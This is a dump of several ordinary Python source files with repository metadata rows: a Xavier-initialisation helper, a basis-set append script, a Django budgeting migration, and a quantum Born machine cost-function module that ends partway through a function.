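```python
import math

def xavier_normal_std(fan_in, fan_out, gain=1.0):
    # Glorot/Xavier normal initialisation: std = gain * sqrt(2 / (fan_in + fan_out))
    return gain * math.sqrt(2.0 / (fan_in + fan_out))

# e.g. a linear layer with 100 inputs and 100 outputs
assert abs(xavier_normal_std(100, 100) - 0.1) < 1e-12
```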
##-------------------------------------------------------------------------------------------------------------------## | 53.668203 | 119 | 0.603469 | 1,480 | 11,646 | 4.531757 | 0.100676 | 0.035784 | 0.052333 | 0.017892 | 0.798867 | 0.789175 | 0.78351 | 0.773073 | 0.766513 | 0.758014 | 0 | 0.00238 | 0.206423 | 11,646 | 217 | 120 | 53.668203 | 0.723328 | 0.173794 | 0 | 0.720588 | 0 | 0 | 0.079135 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051471 | false | 0 | 0.058824 | 0 | 0.161765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bb2f2780686f146e56e28a9a44b5dcd3a31cb92f | 865 | py | Python | basis_set_append/append.py | JorgeG94/useful_tools | 50a085a4aa48fe435f6b9fa8bef44d74c220f289 | [
"MIT"
] | null | null | null | basis_set_append/append.py | JorgeG94/useful_tools | 50a085a4aa48fe435f6b9fa8bef44d74c220f289 | [
"MIT"
] | null | null | null | basis_set_append/append.py | JorgeG94/useful_tools | 50a085a4aa48fe435f6b9fa8bef44d74c220f289 | [
"MIT"
] | null | null | null | from basis import *
import fileinput
import sys
file = sys.argv[1]
for line in fileinput.FileInput(file, inplace=1):
    if "C 6.0" in line:
        line = line.replace(line, line + carbon_sto3g_basis)
    print(line, end='')
for line in fileinput.FileInput(file, inplace=1):
    if "H 1.0" in line:
        line = line.replace(line, line + hydrogen_sto3g_basis)
    print(line, end='')
for line in fileinput.FileInput(file, inplace=1):
    if "O 8.0" in line:
        line = line.replace(line, line + oxygen_sto3g_basis)
    print(line, end='')
for line in fileinput.FileInput(file, inplace=1):
    if "W 74.0" in line:
        line = line.replace(line, line + tungsten_basis)
    print(line, end='')
for line in fileinput.FileInput(file, inplace=1):
    if "P 15.0" in line:
        line = line.replace(line, line + phosphorus_sto3g_basis)
    print(line, end='')
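`fileinput` with `inplace=1` redirects stdout into the file being read, so every `print` rewrites a line, and `line.replace(line, line + basis)` amounts to appending the basis block after the matched line. A self-contained sketch of the same pattern on a throwaway temp file (the marker text is hypothetical, not a real basis block):

```python
import fileinput
import os
import tempfile

# Create a throwaway input file standing in for the quantum-chemistry input.
fd, path = tempfile.mkstemp()
with os.fdopen(fd, "w") as f:
    f.write("C 6.0\nH 1.0\n")

# In inplace mode, stdout is redirected into the file, so printed lines
# replace the original contents line by line.
for line in fileinput.FileInput(path, inplace=1):
    if "C 6.0" in line:
        line = line.rstrip("\n") + " !basis goes here\n"
    print(line, end="")

with open(path) as f:
    rewritten = f.read()
os.remove(path)
assert rewritten == "C 6.0 !basis goes here\nH 1.0\n"
```

Note that the `print(line, end='')` must sit outside the `if`, otherwise non-matching lines would be dropped from the rewritten file.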
| 27.903226 | 58 | 0.65896 | 135 | 865 | 4.155556 | 0.237037 | 0.213904 | 0.080214 | 0.160428 | 0.819964 | 0.780749 | 0.780749 | 0.780749 | 0.513369 | 0.440285 | 0 | 0.032117 | 0.208092 | 865 | 30 | 59 | 28.833333 | 0.786861 | 0 | 0 | 0.416667 | 0 | 0 | 0.053892 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.208333 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bb4e4b7a59c3436e9e78c08338a7ace017a89c47 | 4,179 | py | Python | api/migrations/0001_initial.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | null | null | null | api/migrations/0001_initial.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | 3 | 2020-08-25T18:19:42.000Z | 2022-02-13T19:39:19.000Z | api/migrations/0001_initial.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-08-17 20:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('parent_category', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='api.Category')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Payment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('payment', models.CharField(max_length=100)),
                ('initial_amount', models.DecimalField(decimal_places=2, max_digits=10)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Tag',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('enabled', models.BooleanField(default=True)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='TransactionType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('transaction_type', models.CharField(max_length=100)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Transaction',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('transaction_date', models.DateField()),
                ('description', models.CharField(blank=True, max_length=500)),
                ('amount', models.DecimalField(decimal_places=2, max_digits=10)),
                ('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Category')),
                ('payment_source', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='payment_source', to='api.Payment')),
                ('payment_target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='payment_target', to='api.Payment')),
                ('tag', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='api.Tag')),
                ('transaction_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.TransactionType')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='PaymentInitial',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('amount', models.DecimalField(decimal_places=2, max_digits=10)),
                ('payment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='payment_initial', to='api.Payment')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'unique_together': {('user', 'payment')},
            },
        ),
    ]
| 52.2375 | 171 | 0.614501 | 441 | 4,179 | 5.662132 | 0.185941 | 0.048058 | 0.078494 | 0.123348 | 0.751302 | 0.729676 | 0.729676 | 0.729676 | 0.729676 | 0.670805 | 0 | 0.012346 | 0.244078 | 4,179 | 79 | 172 | 52.898734 | 0.778094 | 0.010768 | 0 | 0.555556 | 1 | 0 | 0.103098 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.097222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bb513f1a011c3d4aad7783997f86ec67a1c17b1e | 29 | py | Python | rekord_wrangler/ui/__init__.py | tullyvey/rekord-wrangler | a1c5fdbbf2d0f20b0a2daf9a2b0336de71478918 | [
"MIT"
] | null | null | null | rekord_wrangler/ui/__init__.py | tullyvey/rekord-wrangler | a1c5fdbbf2d0f20b0a2daf9a2b0336de71478918 | [
"MIT"
] | null | null | null | rekord_wrangler/ui/__init__.py | tullyvey/rekord-wrangler | a1c5fdbbf2d0f20b0a2daf9a2b0336de71478918 | [
"MIT"
] | null | null | null | from .main import MainWindow
| 14.5 | 28 | 0.827586 | 4 | 29 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
24a4db80effede1a31ee897cfae682169088ba14 | 61 | py | Python | conda_forge_tick/__init__.py | brlavon14/cf-scripts | 417f547c3fd269ed581b13f9444462a5b2f8bb46 | [
"BSD-3-Clause"
] | null | null | null | conda_forge_tick/__init__.py | brlavon14/cf-scripts | 417f547c3fd269ed581b13f9444462a5b2f8bb46 | [
"BSD-3-Clause"
] | null | null | null | conda_forge_tick/__init__.py | brlavon14/cf-scripts | 417f547c3fd269ed581b13f9444462a5b2f8bb46 | [
"BSD-3-Clause"
] | null | null | null | import xonsh.imphooks
xonsh.imphooks.install_import_hooks()
| 15.25 | 37 | 0.852459 | 8 | 61 | 6.25 | 0.625 | 0.52 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 61 | 3 | 38 | 20.333333 | 0.877193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
24adfecddad9402e81cc1f4275ba8f83f17252c6 | 66 | py | Python | tests/zip/source/func.py | fbiville/python3-function-invoker | 12056d22dd4abf89377005fdad75c472a2c5a444 | [
"Apache-2.0"
] | 3 | 2018-03-25T08:25:26.000Z | 2019-02-10T02:01:12.000Z | tests/zip/source/func.py | fbiville/python3-function-invoker | 12056d22dd4abf89377005fdad75c472a2c5a444 | [
"Apache-2.0"
] | 11 | 2018-03-14T23:14:23.000Z | 2019-11-08T16:33:40.000Z | tests/zip/source/func.py | fbiville/python3-function-invoker | 12056d22dd4abf89377005fdad75c472a2c5a444 | [
"Apache-2.0"
] | 7 | 2018-02-22T16:18:45.000Z | 2019-03-12T02:45:46.000Z | from helpers import upper
def handler(val):
    return upper(val)
| 16.5 | 25 | 0.742424 | 10 | 66 | 4.9 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 66 | 3 | 26 | 22 | 0.907407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
24be65b4126c52a869a9c759923ca1fd8d99e12e | 45 | py | Python | enthought/pyface/list_box.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 3 | 2016-12-09T06:05:18.000Z | 2018-03-01T13:00:29.000Z | enthought/pyface/list_box.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 1 | 2020-12-02T00:51:32.000Z | 2020-12-02T08:48:55.000Z | enthought/pyface/list_box.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | null | null | null | # proxy module
from pyface.list_box import *
| 15 | 29 | 0.777778 | 7 | 45 | 4.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 45 | 2 | 30 | 22.5 | 0.894737 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
24f1c0050dd3975d2dc4f3ef983ec7657831f4d8 | 18,477 | py | Python | cost_functions.py | mrnp95/IsingBornMachine | 23cf1917a8aa977bb25f0113d8df51f0643d72f1 | [
"MIT"
] | 16 | 2019-04-05T01:03:15.000Z | 2022-02-03T10:57:42.000Z | cost_functions.py | mrnp95/IsingBornMachine | 23cf1917a8aa977bb25f0113d8df51f0643d72f1 | [
"MIT"
] | 1 | 2021-01-19T03:02:18.000Z | 2021-01-23T23:14:22.000Z | cost_functions.py | mrnp95/IsingBornMachine | 23cf1917a8aa977bb25f0113d8df51f0643d72f1 | [
"MIT"
] | 1 | 2020-10-19T13:25:13.000Z | 2020-10-19T13:25:13.000Z | import numpy as np
from random import *
from classical_kernel import GaussianKernelArray
from quantum_kernel import QuantumKernelArray
from numpy import linalg as LA
from file_operations_in import KernelDictFromFile
import stein_functions as sf
import sinkhorn_functions as shornfun
import auxiliary_functions as aux
import sys
import json
import time
def KernelSum(samplearray1, samplearray2, kernel_dict):
'''
This function computes the contribution to the MMD from the empirical distibutions
from two sets of samples.
kernel_dict contains the kernel values for all pairs of binary strings
'''
if type(samplearray1) is not np.ndarray or type(samplearray2) is not np.ndarray:
raise TypeError('The input samples must be in numpy arrays')
N_samples1 = samplearray1.shape[0]
N_samples2 = samplearray2.shape[0]
kernel_array = np.zeros((N_samples1, N_samples2))
for sample1_index in range(0, N_samples1):
for sample2_index in range(0, N_samples2):
sample1 = aux.ToString(samplearray1[sample1_index])
sample2 = aux.ToString(samplearray2[sample2_index])
kernel_array[sample1_index, sample2_index] = kernel_dict[(sample1, sample2)]
return kernel_array
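For reference, the lookup that KernelSum performs can be sketched in isolation. The kernel dictionary entries and sample values below are made up for illustration; only the pairing structure matches the function above.

```python
import numpy as np

# Toy kernel dictionary keyed by pairs of binary strings (illustrative values).
kernel_dict = {("00", "00"): 1.0, ("00", "01"): 0.5,
               ("01", "00"): 0.5, ("01", "01"): 1.0}

def to_string(sample):
    # Convert an integer sample array, e.g. [0, 1], to the string "01".
    return "".join(str(int(bit)) for bit in sample)

samples1 = np.array([[0, 0], [0, 1]])
samples2 = np.array([[0, 1]])

# Rows index samples1, columns index samples2, as in KernelSum.
kernel_array = np.zeros((samples1.shape[0], samples2.shape[0]))
for i in range(samples1.shape[0]):
    for j in range(samples2.shape[0]):
        key = (to_string(samples1[i]), to_string(samples2[j]))
        kernel_array[i, j] = kernel_dict[key]

print(kernel_array)
```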
def CostFunction(qc, cost_func, data_samples, data_exact_dict, born_samples, born_probs_dict,
N_samples, kernel_choice, stein_params, flag, sinkhorn_eps):
    '''
    Computes the chosen cost function between the data distribution and the
    Born machine distribution, given samples drawn from each.
    '''
#Extract unique samples and corresponding empirical probabilities from set of samples
born_emp_samples, born_emp_probs, _, _ = aux.ExtractSampleInformation(born_samples)
data_emp_samples, data_emp_probs, _, _ = aux.ExtractSampleInformation(data_samples)
if cost_func.lower() == 'mmd':
score_choice = stein_params[0]
if score_choice.lower() == 'approx':
if (flag.lower() == 'onfly'):
if (kernel_choice.lower() == 'gaussian'):
sigma = np.array([0.25, 10, 1000])
#Compute the Gaussian kernel on the fly for all samples in the sample space
kernel_born_born_emp = GaussianKernelArray(born_emp_samples, born_emp_samples, sigma)
kernel_born_data_emp = GaussianKernelArray(born_emp_samples, data_emp_samples, sigma)
kernel_data_data_emp = GaussianKernelArray(data_emp_samples, data_emp_samples, sigma)
elif kernel_choice.lower() == 'quantum':
N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
#Compute the Quantum kernel on the fly for all pairs of samples required
kernel_born_born_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_emp_samples)
kernel_born_data_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, data_emp_samples)
kernel_data_data_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_emp_samples, data_emp_samples)
elif (flag.lower() == 'precompute'):
                #Read in the precomputed kernel dictionary from a file
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_born_born_emp = KernelSum(born_emp_samples, born_emp_samples, kernel_dict)
kernel_born_data_emp = KernelSum(born_emp_samples, data_emp_samples, kernel_dict)
kernel_data_data_emp = KernelSum(data_emp_samples, data_emp_samples, kernel_dict)
else: raise ValueError('\'flag\' must be either \'Onfly\' or \'Precompute\'')
loss = np.dot(np.dot(born_emp_probs, kernel_born_born_emp), born_emp_probs) \
- 2*np.dot(np.dot(born_emp_probs, kernel_born_data_emp), data_emp_probs) \
+ np.dot(np.dot(data_emp_probs, kernel_data_data_emp), data_emp_probs)
elif score_choice.lower() == 'exact':
#Compute MMD using exact data probabilities if score is exact
data_exact_samples = aux.SampleListToArray(list(data_exact_dict.keys()), len(qc.qubits()), 'int')
data_exact_probs = np.asarray(list(data_exact_dict.values()))
if (flag.lower() == 'onfly'):
if (kernel_choice.lower() == 'gaussian'):
sigma = np.array([0.25, 10, 1000])
#Compute the Gaussian kernel on the fly for all samples in the sample space
kernel_born_born_emp = GaussianKernelArray(born_emp_samples, born_emp_samples, sigma)
kernel_born_data_emp = GaussianKernelArray(born_emp_samples, data_exact_samples, sigma)
kernel_data_data_emp = GaussianKernelArray(data_exact_samples, data_exact_samples, sigma)
elif kernel_choice.lower() == 'quantum':
N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
#Compute the Quantum kernel on the fly for all pairs of samples required
kernel_born_born_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_emp_samples)
kernel_born_data_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, data_exact_samples)
kernel_data_data_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_exact_samples, data_exact_samples)
elif (flag.lower() == 'precompute'):
                #Read in the precomputed kernel dictionary from a file
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_born_born_emp = KernelSum(born_emp_samples, born_emp_samples, kernel_dict)
kernel_born_data_emp = KernelSum(born_emp_samples, data_exact_samples, kernel_dict)
kernel_data_data_emp = KernelSum(data_exact_samples, data_exact_samples, kernel_dict)
else: raise ValueError('\'flag\' must be either \'Onfly\' or \'Precompute\'')
            loss = np.dot(np.dot(born_emp_probs, kernel_born_born_emp), born_emp_probs) \
                - 2*np.dot(np.dot(born_emp_probs, kernel_born_data_emp), data_exact_probs) \
                + np.dot(np.dot(data_exact_probs, kernel_data_data_emp), data_exact_probs)
elif cost_func.lower() == 'stein':
if flag.lower() == 'onfly':
if (kernel_choice.lower() == 'gaussian'):
sigma = np.array([0.25, 10, 1000])
kernel_array = GaussianKernelArray(born_emp_samples, born_emp_samples, sigma)
elif kernel_choice.lower() == 'quantum':
                N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
                kernel_array ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_emp_samples)
            else: raise ValueError('\'kernel_choice\' must be either \'Gaussian\' or \'Quantum\'')
elif flag.lower() == 'precompute':
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_array = KernelSum(born_emp_samples, born_emp_samples, kernel_dict)
else: raise ValueError('\'flag\' must be either \'Onfly\' or \'Precompute\'')
stein_flag = 'Precompute'
kernel_stein_weighted = sf.WeightedKernel(qc,kernel_choice, kernel_array, N_samples, \
data_samples, data_exact_dict, \
born_emp_samples, born_emp_samples, \
stein_params, stein_flag)
loss = np.dot(np.dot(born_emp_probs, kernel_stein_weighted), born_emp_probs)
elif cost_func.lower() == 'sinkhorn':
#If Sinkhorn cost function to be used
loss = shornfun.FeydySink(born_samples, data_samples, sinkhorn_eps).item()
else: raise ValueError('\'cost_func\' must be either \'MMD\', \'Stein\', or \'Sinkhorn\' ')
return loss
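All of the MMD branches above reduce to the same quadratic form in the empirical probability vectors: loss = p_b K_bb p_b - 2 p_b K_bd p_d + p_d K_dd p_d. A self-contained sketch with a toy multi-sigma Gaussian kernel (the averaging over sigmas and all sample values are illustrative assumptions, not the real GaussianKernelArray):

```python
import numpy as np

def gaussian_kernel(x, y, sigmas=(0.25, 10, 1000)):
    # Toy mixture-of-Gaussians kernel, mirroring the multi-sigma choice above.
    sq = np.sum((x - y) ** 2)
    return sum(np.exp(-sq / (2 * s)) for s in sigmas) / len(sigmas)

def kernel_matrix(A, B):
    return np.array([[gaussian_kernel(a, b) for b in B] for a in A])

born_samples = np.array([[0, 0], [0, 1]])
data_samples = np.array([[0, 1], [1, 1]])
born_probs = np.array([0.5, 0.5])  # toy empirical probabilities
data_probs = np.array([0.5, 0.5])

K_bb = kernel_matrix(born_samples, born_samples)
K_bd = kernel_matrix(born_samples, data_samples)
K_dd = kernel_matrix(data_samples, data_samples)

# MMD as a quadratic form; non-negative for a positive semi-definite kernel.
mmd = (born_probs @ K_bb @ born_probs
       - 2 * born_probs @ K_bd @ data_probs
       + data_probs @ K_dd @ data_probs)
print(round(float(mmd), 6))
```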
def CostGrad(qc, cost_func, data_samples, data_exact_dict,
born_samples, born_probs_dict, born_samples_pm,
N_samples, kernel_choice, stein_params, flag, sinkhorn_eps):
    '''
    Computes the gradient of the chosen cost function, cost_func, with respect
    to the circuit parameters, using samples from the +/- shifted circuits.
    '''
[born_samples_plus, born_samples_minus] = born_samples_pm
#extract unique samples, and corresponding probabilities from a list of samples
born_emp_samples, born_emp_probs, _, _ = aux.ExtractSampleInformation(born_samples)
data_emp_samples, data_emp_probs, _, _ = aux.ExtractSampleInformation(data_samples)
born_plus_emp_samples, born_plus_emp_probs, _, _ = aux.ExtractSampleInformation(born_samples_plus)
born_minus_emp_samples, born_minus_emp_probs, _, _ = aux.ExtractSampleInformation(born_samples_minus)
if cost_func.lower() == 'mmd':
score_choice = stein_params[0]
if score_choice.lower() == 'approx':
if flag.lower() == 'onfly':
if kernel_choice.lower() == 'gaussian':
sigma = np.array([0.25, 10, 1000])
#Compute the Gaussian kernel on the fly for all pairs of samples required
kernel_born_plus_emp = GaussianKernelArray(born_emp_samples, born_plus_emp_samples, sigma)
                    kernel_born_minus_emp = GaussianKernelArray(born_emp_samples, born_minus_emp_samples, sigma)
kernel_data_plus_emp = GaussianKernelArray(data_emp_samples, born_plus_emp_samples, sigma)
                    kernel_data_minus_emp = GaussianKernelArray(data_emp_samples, born_minus_emp_samples, sigma)
elif kernel_choice.lower() == 'quantum':
N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
#Compute the Quantum kernel on the fly for all pairs of samples required
kernel_born_plus_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_plus_emp_samples)
                    kernel_born_minus_emp,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_minus_emp_samples)
kernel_data_plus_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_emp_samples, born_plus_emp_samples)
                    kernel_data_minus_emp,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_emp_samples, born_minus_emp_samples)
elif flag.lower() == 'precompute':
                #To speed up computation, read in the precomputed kernel dictionary from a file.
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_born_plus_emp = KernelSum(born_emp_samples, born_plus_emp_samples, kernel_dict)
kernel_born_minus_emp = KernelSum(born_emp_samples, born_minus_emp_samples, kernel_dict)
kernel_data_plus_emp = KernelSum(data_emp_samples, born_plus_emp_samples, kernel_dict)
kernel_data_minus_emp = KernelSum(data_emp_samples, born_minus_emp_samples, kernel_dict)
else: raise ValueError('\'flag\' must be either \'Onfly\' or \'Precompute\'')
loss_grad = 2*( np.dot(np.dot(born_emp_probs, kernel_born_minus_emp), born_minus_emp_probs) \
- np.dot(np.dot(born_emp_probs, kernel_born_plus_emp), born_plus_emp_probs) \
- np.dot(np.dot(data_emp_probs, kernel_data_minus_emp), born_minus_emp_probs) \
+ np.dot(np.dot(data_emp_probs, kernel_data_plus_emp), born_plus_emp_probs) )
elif score_choice.lower() == 'exact':
#Compute MMD using exact data probabilities if score is exact
data_exact_samples = aux.SampleListToArray(list(data_exact_dict.keys()), len(qc.qubits()), 'int')
data_exact_probs = np.asarray(list(data_exact_dict.values()))
if flag.lower() == 'onfly':
if kernel_choice.lower() == 'gaussian':
sigma = np.array([0.25, 10, 1000])
#Compute the Gaussian kernel on the fly for all pairs of samples required
kernel_born_plus_emp = GaussianKernelArray(born_emp_samples, born_plus_emp_samples, sigma)
                    kernel_born_minus_emp = GaussianKernelArray(born_emp_samples, born_minus_emp_samples, sigma)
kernel_data_plus_emp = GaussianKernelArray(data_exact_samples, born_plus_emp_samples, sigma)
                    kernel_data_minus_emp = GaussianKernelArray(data_exact_samples, born_minus_emp_samples, sigma)
elif kernel_choice.lower() == 'quantum':
N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
#Compute the Quantum kernel on the fly for all pairs of samples required
kernel_born_plus_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_plus_emp_samples)
                    kernel_born_minus_emp,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_minus_emp_samples)
kernel_data_plus_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_exact_samples, born_plus_emp_samples)
                    kernel_data_minus_emp,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, data_exact_samples, born_minus_emp_samples)
elif flag.lower() == 'precompute':
                #To speed up computation, read in the precomputed kernel dictionary from a file.
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_born_plus_emp = KernelSum(born_emp_samples, born_plus_emp_samples, kernel_dict)
kernel_born_minus_emp = KernelSum(born_emp_samples, born_minus_emp_samples, kernel_dict)
kernel_data_plus_emp = KernelSum(data_exact_samples, born_plus_emp_samples, kernel_dict)
kernel_data_minus_emp = KernelSum(data_exact_samples, born_minus_emp_samples, kernel_dict)
else: raise ValueError('\'flag\' must be either \'Onfly\' or \'Precompute\'')
loss_grad = 2*( np.dot(np.dot(born_emp_probs, kernel_born_minus_emp), born_minus_emp_probs) \
- np.dot(np.dot(born_emp_probs, kernel_born_plus_emp), born_plus_emp_probs) \
- np.dot(np.dot(data_exact_probs, kernel_data_minus_emp), born_minus_emp_probs) \
+ np.dot(np.dot(data_exact_probs, kernel_data_plus_emp), born_plus_emp_probs) )
elif cost_func.lower() == 'stein':
if flag.lower() == 'onfly':
if kernel_choice.lower() == 'gaussian':
sigma = np.array([0.25, 10, 1000])
#Compute the Gaussian kernel on the fly for all pairs of samples required
kernel_born_plus_emp = GaussianKernelArray(born_emp_samples, born_plus_emp_samples, sigma)
                kernel_born_minus_emp = GaussianKernelArray(born_emp_samples, born_minus_emp_samples, sigma)
elif kernel_choice.lower() == 'quantum':
N_kernel_samples = N_samples[-1] #Number of kernel samples is the last element of N_samples
#Compute the Quantum kernel on the fly for all pairs of samples required
kernel_born_plus_emp ,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_plus_emp_samples)
                kernel_born_minus_emp,_,_,_ = QuantumKernelArray(qc, N_kernel_samples, born_emp_samples, born_minus_emp_samples)
elif flag.lower() == 'precompute':
            #To speed up computation, read in the precomputed kernel dictionary from a file.
kernel_dict = KernelDictFromFile(qc, N_samples, kernel_choice)
kernel_born_plus_emp = KernelSum(born_emp_samples, born_plus_emp_samples, kernel_dict)
kernel_born_minus_emp = KernelSum(born_emp_samples, born_minus_emp_samples, kernel_dict)
kernel_plus_born_emp = np.transpose(kernel_born_plus_emp)
kernel_minus_born_emp = np.transpose(kernel_born_minus_emp)
stein_kernel_choice = stein_params[3]
